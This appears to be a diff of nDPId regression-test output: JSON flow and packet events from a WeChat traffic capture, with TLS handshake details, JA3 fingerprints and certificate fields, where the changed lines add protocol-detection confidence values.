+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167455528,"flow_last_seen":1492167455528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167455528,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1492167455528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167455528,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8kudAAEAGglXAqAFny82XotNYAbvneYz3AAAAAKACchBIqgAAAgQFtAQCCAoAMR4QAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167455891,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701iyhnqT53mM+KASN8htQwAAAgQFoAQCCApFraLqADEeEAEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167455891,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0kuhAAEAGglzAqAFny82XotNYAbvneYz4soZ6lIAQAOXShAAAAQEICgAxHmpFraLq"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"ts_msec":1492167477895,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"ts_msec":1492167477895,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"ts_msec":1492167477895,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167477895,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167477895,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167477895,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00594{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167477895,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00630{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167477895,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167477895,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
